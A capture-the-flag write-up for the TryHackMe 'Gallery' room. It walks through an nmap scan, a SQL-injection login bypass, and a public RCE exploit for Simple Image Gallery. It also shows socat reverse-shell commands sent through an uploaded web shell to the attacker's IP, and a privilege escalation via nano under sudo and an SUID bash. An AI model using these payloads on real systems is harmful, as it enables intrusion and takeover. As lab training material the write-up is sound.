Writeup [Gallery](https://tryhackme.com/room/gallery666)

# Writeup [Gallery](https://tryhackme.com/room/gallery666) ###### Nmap ``` ──(###########)-[~/THM/gallery] └─$ nmap -sV -Pn -A 10.10.112.224 | tee port_test Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-02 13:33 EDT Nmap scan report for 10.10.112.224 Host is up (0.44s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 8080/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) | http-open-proxy: Potentially OPEN proxy. |_Methods supported:CONNECTION | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-title: Simple Image Gallery System Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 54.54 seconds ``` >So there are ***2 ports*** open >Let's check bot of them. On port `80` there is home page but on port `8080` there ids login named as **[Simple Image Gallery](https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwiQ0eqfktz4AhUU-DgGHdHNAocQFnoECBsQAQ&url=https%3A%2F%2Fwww.exploit-db.com%2Fexploits%2F50214&usg=AOvVaw0tFldoZswx1jVjvHlJheau)** >On searching about it we got know it is a CMS So our answer for 2nd question is `Simple Image Galley` >So we have login page with no cred lets try to do simple sql in it >Username = ' OR 1=1 -- - Password = "" Guess what we get logged in!! :) > Lets search for sploit for Simple Gallery System By running serachsploit Simple Image Gallery ``` searchsploit Simple Image Gallery --------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------------------------------------------------------------------------------- --------------------------------- Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities | php/webapps/49064.txt Joomla! Component Kubik-Rubik Simple Image Gallery Extended (SIGE) 3.2.3 - Cross-Site Scripting | php/webapps/44104.txt Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated) | php/webapps/50214.py Simple Image Gallery System 1.0 - 'id' SQL Injection | php/webapps/50198.txt --------------------------------------------------------------------------------------------------------------------------- --------------------------------- ``` >Lets try to run exploit `50214.py` for remote code execution but running and setting target to our <ip> we get, ![](https://i.imgur.com/QcgRHUy.png) >So here we got link for remote code execution ![](https://i.imgur.com/sRsbJkx.png) No lets do reverseshell in it,to do this we are going to url encode it: ``` http://10.10.159.190/gallery/uploads/1656838200_TagokjrjzbyzsykmavtLetta.php?cmd=socat%20tcp-connect:<sys-ip>:1234%20exec:/bin/sh,pty,stderr,setsid,sigint,sane ``` >After getting shell let's stabalise it with socat use ***==socat file:`tty`,raw,echo=0 tcp-listen:4444==*** on your system and following on shell ``` socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.6.35.22:4444 ``` so we get the stabalize shell >Lets eumerate and get the user flag as on searching we don't get any data in current directory ,so we have to chec all directory and each file there On searching we got some user known as `mike` >We can therefore find a backup of part of mike 's home, however we can read everything and even the bash_history lets check `.bash_history` this reveals something that is usefull ![](https://i.imgur.com/YYxk08k.png) >So we get the password for mike So let's be mike ![](https://i.imgur.com/pEtbClh.png) ![](https://i.imgur.com/P9m5znY.png) ### Becoming Root after doing `sudo -l` we get to know it is running `/opt/rootkit.sh` ![](https://i.imgur.com/UPmmg8z.png) let's check what's in `rootkit.sh` ![](https://i.imgur.com/3ec0Niq.png) As `rootkit.sh` is run by root and in that `read` command help us to get into `nano` there we can escalate the privilage and be the root on doing so it shows `Error opening terminal: unknown.` that is we have to give it specific terminal to it use command ***==export TERM=xterm==*** to do so. now again run it ![](https://i.imgur.com/BjmbTim.png) we get this shell, now do `^R ^X` to execute command in nano terminal as we can execute any command let's setd suid on /bin/bash by doing `chmod a+s /bin/bash` After exiting nano run `/bin/bash -p` and hence we become root!!! :) ![](https://i.imgur.com/1FJuzMZ.png) >now just read `root.txt` ![](https://i.imgur.com/g7zzcO5.png) Now only thing remain is getting hashes of admin user exit the root shell and mike come to our www-data shell to find the admin hashes In that at `gallery` directory we get `initialize.php` inwhich username and password were given ![](https://i.imgur.com/n4nyTfC.png) So we get the database username `gallery_user` and password as `passw0rd321` let's get into database ![](https://i.imgur.com/lqwli1p.png) ![](https://i.imgur.com/Qy0vyC7.png) ![](https://i.imgur.com/jiCbRkU.png) >Here we got the hashes. Hence The box is done! :):)